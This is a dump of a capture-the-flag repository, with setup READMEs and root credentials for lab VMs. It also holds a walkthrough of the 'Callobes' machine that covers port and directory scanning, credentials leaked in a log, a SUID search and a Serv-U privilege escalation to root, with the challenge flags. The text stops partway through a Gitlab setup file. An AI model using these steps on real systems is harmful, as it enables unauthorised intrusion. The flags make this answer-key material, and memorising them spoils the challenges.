https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Blitz/Screenshots/burp-intercept-newproduct.png
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Blitz/Screenshots/discovering-sql-error.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Blitz/Screenshots/discovering-sql-error.png
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Blitz/Screenshots/file-upload-1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Blitz/Screenshots/file-upload-1.png
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Blitz/Screenshots/file-upload-2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Blitz/Screenshots/file-upload-2.png
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Blitz/Screenshots/file-upload-3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Blitz/Screenshots/file-upload-3.png
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Blitz/Screenshots/git-gitserver-staging.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Blitz/Screenshots/git-gitserver-staging.png
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Blitz/Screenshots/git-ls-la.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Blitz/Screenshots/git-ls-la.png
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Blitz/Screenshots/git-pipeline-staging.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Blitz/Screenshots/git-pipeline-staging.png
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Blitz/Screenshots/jenkins-app-dashboard.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Blitz/Screenshots/jenkins-app-dashboard.png
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Blitz/Screenshots/jenkins-build.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Blitz/Screenshots/jenkins-build.png
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Blitz/Screenshots/jenkins-dashboard.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Blitz/Screenshots/jenkins-dashboard.png
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Blitz/Screenshots/jenkins-landing.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Blitz/Screenshots/jenkins-landing.png
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Blitz/Screenshots/jenkins-login-screen.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Blitz/Screenshots/jenkins-login-screen.png
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Blitz/Screenshots/jwt-1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Blitz/Screenshots/jwt-1.png
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Blitz/Screenshots/jwt-2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Blitz/Screenshots/jwt-2.png
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Blitz/Screenshots/jwt-3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Blitz/Screenshots/jwt-3.png
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Blitz/Screenshots/main-landing.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Blitz/Screenshots/main-landing.png
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Blitz/Screenshots/main-login.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Blitz/Screenshots/main-login.png
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Blitz/Screenshots/make-admin-added-new-admin.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Blitz/Screenshots/make-admin-added-new-admin.png
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Blitz/Screenshots/prod-web-root.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Blitz/Screenshots/prod-web-root.png
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Blitz/Screenshots/registration-test.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Blitz/Screenshots/registration-test.png
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Blitz/Screenshots/shell-as-postgres.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Blitz/Screenshots/shell-as-postgres.png
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Blitz/Screenshots/source-code-1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Blitz/Screenshots/source-code-1.png
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Blitz/Screenshots/sql-0-intercept.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Blitz/Screenshots/sql-0-intercept.png
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Blitz/Screenshots/sql-1-create-table.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Blitz/Screenshots/sql-1-create-table.png
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Blitz/Screenshots/sql-2-rce.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Blitz/Screenshots/sql-2-rce.png
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Bytescribe/README.md:
--------------------------------------------------------------------------------
1 | # Setup
2 |
3 | 1. Use the installation link to download the .ova file.
4 | 2. Import the image file to VMware using File -> Open
5 |
6 | 
7 |
8 | > [!WARNING]
9 | > The images are not supported by virtualbox.
10 |
11 | 3. Choose a Virtual Machine name and location for the new VM.
12 | 4. The default Network Interface is configured as NAT. If not, please do so.
13 | 5. You can find IP address of the machine using arp-scan in your kali machine.
14 | ```
15 | ┌──(kali㉿kali)-[~]
16 | └─$ sudo arp-scan -l
17 | Interface: eth0, type: EN10MB, MAC: 00:0c:29:f7:91:2b, IPv4: 192.168.163.133
18 | Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
19 | 192.168.163.1 00:50:56:c0:00:08 VMware, Inc.
20 | 192.168.163.2 00:50:56:e9:26:ad VMware, Inc.
21 | 192.168.163.135 00:0c:29:15:64:ff VMware, Inc.
22 | 192.168.163.254 00:50:56:fb:dd:06 VMware, Inc.
23 |
24 | 4 packets received by filter, 0 packets dropped by kernel
25 | Ending arp-scan 1.10.0: 256 hosts scanned in 2.018 seconds (126.86 hosts/sec). 4 responded
26 |
27 | ┌──(kali㉿kali)-[~]
28 | └─$ ssh root@192.168.163.135
29 | The authenticity of host '192.168.163.135 (192.168.163.135)' can't be established.
30 | ED25519 key fingerprint is SHA256:FgEM7djbdkf6qtvyLOr4TPV35vMzjmXSJ09Cm8VHB8k.
31 | This key is not known by any other names.
32 | Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
33 | Warning: Permanently added '192.168.163.135' (ED25519) to the list of known hosts.
34 | root@192.168.163.135's password:
35 | Permission denied, please try again.
36 | root@192.168.163.135's password:
37 | Permission denied, please try again.
38 | root@192.168.163.135's password:
39 | Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 6.2.0-33-generic x86_64)
40 |
41 | * Documentation: https://help.ubuntu.com
42 | * Management: https://landscape.canonical.com
43 | * Support: https://ubuntu.com/advantage
44 |
45 | Expanded Security Maintenance for Applications is not enabled.
46 |
47 | 28 updates can be applied immediately.
48 | 27 of these updates are standard security updates.
49 | To see these additional updates run: apt list --upgradable
50 |
51 | Enable ESM Apps to receive additional future security updates.
52 | See https://ubuntu.com/esm or run: sudo pro status
53 |
54 | Last login: Thu Sep 14 21:15:45 2023 from 10.1.3.1
55 | root@bytescribe-virtual-machine:~#
56 |
57 | ```
58 | 6. If something goes wrong, use the credentials provided below to access the machine.
59 |
60 | # Credentials
61 | ```
62 | root:qpWO10@(
63 | ```
64 |
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Bytescribe/Screenshots/Screenshot-2023-10-06-024100.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Bytescribe/Screenshots/Screenshot-2023-10-06-024100.png
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Bytescribe/Screenshots/Screenshot-2023-10-06-035333.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Bytescribe/Screenshots/Screenshot-2023-10-06-035333.png
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Callobes/README.md:
--------------------------------------------------------------------------------
1 | # Setup
2 |
3 | 1. Use the installation link to download the .ova file.
4 | 2. Import the image file to VMware using File -> Open
5 |
6 | 
7 |
8 | > [!WARNING]
9 | > The images are not supported by virtualbox.
10 |
11 | 3. Choose a Virtual Machine name and location for the new VM.
12 | 4. The default Network Interface is configured as NAT. If not, please do so.
13 | 5. You can find IP address of the machine using arp-scan in your kali machine.
14 | ```
15 | ┌──(kali㉿kali)-[~]
16 | └─$ sudo arp-scan -l
17 | Interface: eth0, type: EN10MB, MAC: 00:0c:29:2e:e5:cf, IPv4: 192.168.121.128
18 | Starting arp-scan 1.9.8 with 256 hosts (https://github.com/royhills/arp-scan)
19 | 192.168.121.1 00:50:56:c0:00:08 VMware, Inc.
20 | 192.168.121.2 00:50:56:f2:3b:82 VMware, Inc.
21 | 192.168.121.129 00:0c:29:c7:d8:5e VMware, Inc.
22 | 192.168.121.254 00:50:56:e4:f5:4c VMware, Inc.
23 |
24 | 4 packets received by filter, 0 packets dropped by kernel
25 | Ending arp-scan 1.9.8: 256 hosts scanned in 2.050 seconds (124.88 hosts/sec). 4 responded
26 |
27 | ┌──(kali㉿kali)-[~]
28 | └─$ ssh root@192.168.121.129
29 | root@192.168.121.129's password:
30 | Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 5.3.0-53-generic x86_64)
31 |
32 | * Documentation: https://help.ubuntu.com
33 | * Management: https://landscape.canonical.com
34 | * Support: https://ubuntu.com/advantage
35 |
36 | * Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
37 | just raised the bar for easy, resilient and secure K8s cluster deployment.
38 |
39 | https://ubuntu.com/engage/secure-kubernetes-at-the-edge
40 |
41 | * Canonical Livepatch is available for installation.
42 | - Reduce system reboots and improve kernel security. Activate at:
43 | https://ubuntu.com/livepatch
44 |
45 | 74 packages can be updated.
46 | 28 updates are security updates.
47 |
48 | New release '20.04.6 LTS' available.
49 | Run 'do-release-upgrade' to upgrade to it.
50 |
51 | Your Hardware Enablement Stack (HWE) is supported until April 2023.
52 | Last login: Fri Oct 6 04:20:37 2023 from 192.168.121.128
53 | root@shimishao:~#
54 | ```
55 |
56 |
57 | 6. If something goes wrong, use the credentials provided below to access the machine.
58 |
59 | # Credentials
60 | ```
61 | root:1qaSDFgtr
62 | ```
63 |
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Callobes/Screenshots/image-1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Callobes/Screenshots/image-1.png
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Callobes/Screenshots/image-2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Callobes/Screenshots/image-2.png
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Callobes/Screenshots/image-3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Callobes/Screenshots/image-3.png
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Callobes/Screenshots/image-4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Callobes/Screenshots/image-4.png
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Callobes/Screenshots/image-5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Callobes/Screenshots/image-5.png
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Callobes/Screenshots/image-6.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Callobes/Screenshots/image-6.png
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Callobes/Screenshots/image.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Callobes/Screenshots/image.png
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Callobes/Walkthrough.md:
--------------------------------------------------------------------------------
1 | # Callobes
2 |
3 | This machine is taken from [Vulnhub](https://www.vulnhub.com/entry/election-1,503/) to support the idea of open source! We intend to continue sharing our projects as open source in the future.
4 |
5 | There are several ways to exploit the machine, and we are currently sharing one method. You are encouraged to explore and discover other paths independently.
6 |
7 | ## High Level Overview
8 | "Callobes" is a Linux-based easy Capture The Flag (CTF) machine that presents an engaging and challenging cybersecurity scenario. Here's a brief overview:
9 | This machine features both a web server and an SSH server. The web server has Path Traversal vulnerability hiding a crucial piece of information, specifically credentials, within a file.
10 | Upon successfully gaining an initial foothold, you'll discover a setuid binary named "Serv-u." This binary holds the key to escalating your privileges and potentially achieving root access on the system.
11 | "Callobes" promises to challenge your skills in web exploitation, Linux privilege escalation, and potentially other areas of cybersecurity, making it an exciting platform for honing your penetration testing abilities.
12 |
13 | ## Enumerating the target
14 | Run a full-range port scan to find all open ports.
15 |
16 | ```
17 | ┌──(kali㉿kali)-[~]
18 | └─$ nmap -p- 192.168.121.129
19 | Starting Nmap 7.93 ( https://nmap.org ) at 2023-10-05 19:10 EDT
20 | Nmap scan report for 192.168.121.129
21 | Host is up (0.00028s latency).
22 | Not shown: 65533 closed tcp ports (conn-refused)
23 | PORT STATE SERVICE
24 | 22/tcp open ssh
25 | 80/tcp open http
26 |
27 | Nmap done: 1 IP address (1 host up) scanned in 2.93 seconds
28 |
29 | ```
30 | Nmap found two tcp ports (22, 80)
31 |
32 | Navigating to the IP address in a browser we see the following.
33 |
34 | 
35 |
36 | let’s run a dirbuster:
37 | ```
38 | ┌──(kali㉿kali)-[~]
39 | └─$ dirb http://192.168.121.129
40 |
41 | -----------------
42 | DIRB v2.22
43 | By The Dark Raver
44 | -----------------
45 |
46 | START_TIME: Thu Oct 5 19:47:57 2023
47 | URL_BASE: http://192.168.121.129/
48 | WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
49 |
50 | -----------------
51 |
52 | GENERATED WORDS: 4612
53 |
54 | ---- Scanning URL: http://192.168.121.129/ ----
55 | + http://192.168.121.129/index.html (CODE:200|SIZE:10918)
56 | ==> DIRECTORY: http://192.168.121.129/javascript/
57 | + http://192.168.121.129/phpinfo.php (CODE:200|SIZE:95537)
58 | ==> DIRECTORY: http://192.168.121.129/phpmyadmin/
59 | + http://192.168.121.129/robots.txt (CODE:200|SIZE:31)
60 | + http://192.168.121.129/server-status (CODE:403|SIZE:280)
61 |
62 | ```
63 | With dirbuster we have an access directory, as well as an index.html, and robots.txt file
64 | As seen above we see a directory named robots.txt.
65 |
66 | First, navigate to the robots.txt file. We have four words in the robots.txt directory, as seen below.
67 |
68 | 
69 |
70 | We just only have access to the Shimishao directory.
71 |
72 | We can use the dirbuster tool again in the Shimishao directory
73 | ```
74 | ┌──(kali㉿kali)-[~]
75 | └─$ dirb http://192.168.121.129/shimishao
76 |
77 | -----------------
78 | DIRB v2.22
79 | By The Dark Raver
80 | -----------------
81 |
82 | START_TIME: Thu Oct 5 19:58:42 2023
83 | URL_BASE: http://192.168.121.129/shimishao/
84 | WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
85 |
86 | -----------------
87 |
88 | GENERATED WORDS: 4612
89 |
90 | ---- Scanning URL: http://192.168.121.129/shimishao/ ----
91 | ==> DIRECTORY: http://192.168.121.129/shimishao/admin/
92 | ==> DIRECTORY: http://192.168.121.129/shimishao/data/
93 | + http://192.168.121.129/shimishao/index.php (CODE:200|SIZE:6597)
94 | ==> DIRECTORY: http://192.168.121.129/shimishao/js/
95 | ==> DIRECTORY: http://192.168.121.129/shimishao/languages/
96 | ==> DIRECTORY: http://192.168.121.129/shimishao/lib/
97 | ==> DIRECTORY: http://192.168.121.129/shimishao/media/
98 | ==> DIRECTORY: http://192.168.121.129/shimishao/themes/
99 |
100 | ---- Entering directory: http://192.168.121.129/shimishao/admin/ ----
101 | ==> DIRECTORY: http://192.168.121.129/shimishao/admin/ajax/
102 | ==> DIRECTORY: http://192.168.121.129/shimishao/admin/components/
103 | ==> DIRECTORY: http://192.168.121.129/shimishao/admin/css/
104 | ==> DIRECTORY: http://192.168.121.129/shimishao/admin/img/
105 | ==> DIRECTORY: http://192.168.121.129/shimishao/admin/inc/
106 | + http://192.168.121.129/shimishao/admin/index.php (CODE:200|SIZE:8967)
107 | ==> DIRECTORY: http://192.168.121.129/shimishao/admin/js/
108 | ==> DIRECTORY: http://192.168.121.129/shimishao/admin/logs/
109 | ==> DIRECTORY: http://192.168.121.129/shimishao/admin/plugins/
110 |
111 | ```
112 | As seen above, we can see shmishao/admin/logs directory which is useful for us.
113 | Let's try directly access this directory:
114 |
115 | 
116 |
117 | We see system.log file . Install this and see what we found.
118 | 
119 |
120 | As seen above we got our credentials for the ubuntu user pred8or. Now we can use these credentials to log in ssh.
121 |
122 | ```
123 | ┌──(kali㉿kali)-[~]
124 | └─$ ssh pred8or@192.168.121.129
125 | pred8or@192.168.121.129's password:
126 | Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 5.3.0-53-generic x86_64)
127 |
128 | * Documentation: https://help.ubuntu.com
129 | * Management: https://landscape.canonical.com
130 | * Support: https://ubuntu.com/advantage
131 |
132 | * Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
133 | just raised the bar for easy, resilient and secure K8s cluster deployment.
134 |
135 | https://ubuntu.com/engage/secure-kubernetes-at-the-edge
136 |
137 | * Canonical Livepatch is available for installation.
138 | - Reduce system reboots and improve kernel security. Activate at:
139 | https://ubuntu.com/livepatch
140 |
141 | 74 packages can be updated.
142 | 28 updates are security updates.
143 |
144 | New release '20.04.6 LTS' available.
145 | Run 'do-release-upgrade' to upgrade to it.
146 |
147 | Your Hardware Enablement Stack (HWE) is supported until April 2023.
148 | Last login: Tue Oct 3 03:42:01 2023 from 192.168.163.1
149 | pred8or@shimishao:~$
150 | ```
151 |
152 | From there we can see that we have found the user1.txt file. Let's read it via cat user1.txt. We've successfully found the flag!
153 |
154 | ```
155 | pred8or@shimishao:~$ ls
156 | Desktop Documents Downloads Music Pictures Public Templates user1.txt Videos
157 | pred8or@shimishao:~$ cat user1.txt
158 | ICSD{66d74978b307889bea234a4bc6570a36}
159 |
160 | ```
161 |
162 | Privilege escelation is the process of going from lower permissions to higher permission. This is done by exploiting vulnerabilities, design flaws or misconfigurations in applications. This process is very important.
163 |
164 | By using the following command you can enumerate all binaries having SUID permissions:
165 |
166 | ```
167 | find / -perm -u=s -type f 2>/dev/null
168 | ```
169 | ```
170 | pred8or@shimishao:/$ find / -perm -u=s -type f 2>/dev/null
171 | /usr/bin/arping
172 | /usr/bin/passwd
173 | /usr/bin/pkexec
174 | /usr/bin/traceroute6.iputils
175 | /usr/bin/newgrp
176 | /usr/bin/chsh
177 | /usr/bin/chfn
178 | /usr/bin/gpasswd
179 | /usr/bin/sudo
180 | /usr/sbin/pppd
181 | /usr/local/Serv-U/Serv-U
182 |
183 |
184 | ```
185 |
186 | Following the execution of the specified command, we have identified the Serv-U with suid (Set User ID) permissions. Let's google it and see what vulnerability we find.
187 |
188 | 
189 |
190 | In Exploit-DB "Serv-U FTP Server < 15.1.7 - Local Privilege Escalation" we found vulnerable version.
191 |
192 | https://www.exploit-db.com/exploits/47173
193 |
194 | Let's exploit it:
195 |
196 | We copy this bash script and run it in our home directory.
197 |
198 | ```
199 | pred8or@shimishao:~$ ls
200 | b.sh Desktop Documents Downloads Music Pictures Public Templates user1.txt Videos
201 | pred8or@shimishao:~$ bash b.sh
202 | [*] Launching Serv-U ...
203 | sh: 1: : Permission denied
204 | [+] Success:
205 | -rwsr-xr-x 1 root root 1113504 Oct 6 07:12 /tmp/sh
206 | [*] Launching root shell: /tmp/sh
207 | sh-4.4# whoami
208 | root
209 | sh-4.4# cd /root
210 | sh-4.4# ls
211 | root.txt
212 | sh-4.4# cat root.txt
213 | ICSD{45caa8f3afa6fc94aa3c039ceeeb7883}
214 | sh-4.4#
215 | ```
216 |
217 |
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Captivity/README.md:
--------------------------------------------------------------------------------
1 | # Setup
2 |
3 | 1. Use the installation link to download the .ova file.
4 | 2. Import the image file to VMware using File -> Open
5 |
6 | > [!WARNING]
7 | > The images are not supported by virtualbox.
8 |
9 | 3. Choose a Virtual Machine name and location for the new VM.
10 | 4. The default Network Interface is configured as NAT. If not, please do so.
11 | 5. You can find IP address of the machine using arp-scan in your kali machine.
12 | ```
13 | ┌──(kali㉿kali)-[~/Captivity]
14 | └─$ sudo arp-scan -l
15 | Interface: eth0, type: EN10MB, MAC: 00:0c:29:ee:f4:ad, IPv4: 192.168.100.132
16 | Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
17 | 192.168.100.1 00:50:56:c0:00:08 VMware, Inc.
18 | 192.168.100.2 00:50:56:e5:ad:c6 VMware, Inc.
19 | 192.168.100.130 00:0c:29:94:0e:fd VMware, Inc.
20 | 192.168.100.254 00:50:56:fa:13:b9 VMware, Inc.
21 |
22 | 4 packets received by filter, 0 packets dropped by kernel
23 | Ending arp-scan 1.10.0: 256 hosts scanned in 2.303 seconds (111.16 hosts/sec). 4 responded
24 | ```
25 | 6. If something goes wrong, use the credentials provided below to access the machine.
26 |
27 | # Credentials
28 | ```
29 | Administrator:gnE4ZqIYDxX78uPek1Xo
30 | ```
31 |
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Captivity/Screenshots/80_landing.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Captivity/Screenshots/80_landing.png
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Captivity/Screenshots/bloodhound-analysis.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Captivity/Screenshots/bloodhound-analysis.png
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Captivity/Screenshots/bloodhound-login.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Captivity/Screenshots/bloodhound-login.png
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Captivity/Screenshots/bloodhound-shortest-path-2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Captivity/Screenshots/bloodhound-shortest-path-2.png
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Captivity/Screenshots/bloodhound-shortest-path.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Captivity/Screenshots/bloodhound-shortest-path.png
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Captivity/Screenshots/file-hosting-dashboard-2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Captivity/Screenshots/file-hosting-dashboard-2.png
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Captivity/Screenshots/file-hosting-dashboard.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Captivity/Screenshots/file-hosting-dashboard.png
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Captivity/Screenshots/file-hosting-landing.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Captivity/Screenshots/file-hosting-landing.png
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Captivity/Screenshots/file-hosting-login.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Captivity/Screenshots/file-hosting-login.png
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Captivity/Screenshots/file-hosting-upload-exploit-2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Captivity/Screenshots/file-hosting-upload-exploit-2.png
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Captivity/Screenshots/file-hosting-upload-exploit.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Captivity/Screenshots/file-hosting-upload-exploit.png
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Captivity/Screenshots/file-hosting-upload.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Captivity/Screenshots/file-hosting-upload.png
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Captivity/Screenshots/google-exploit.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Captivity/Screenshots/google-exploit.png
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Captivity/Screenshots/neo4j-initialize.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Captivity/Screenshots/neo4j-initialize.png
--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Gitlab/README.md:
--------------------------------------------------------------------------------
1 | # Setup
2 |
3 | 1. Use the installation link to download the .ova file.
4 | 2. Import the image file to VMware using File -> Open
5 |
6 | 
7 |
8 | > [!WARNING]
9 | > The images are not supported by virtualbox.
10 |
11 | 3. Choose a Virtual Machine name and location for the new VM.
12 | 4. The default Network Interface is configured as NAT. If not, please do so.
13 | 5. You can find IP address of the machine using arp-scan in your kali machine.
14 | ```
15 | ┌──(kali㉿kali)-[~]
16 | └─$ sudo arp-scan -l
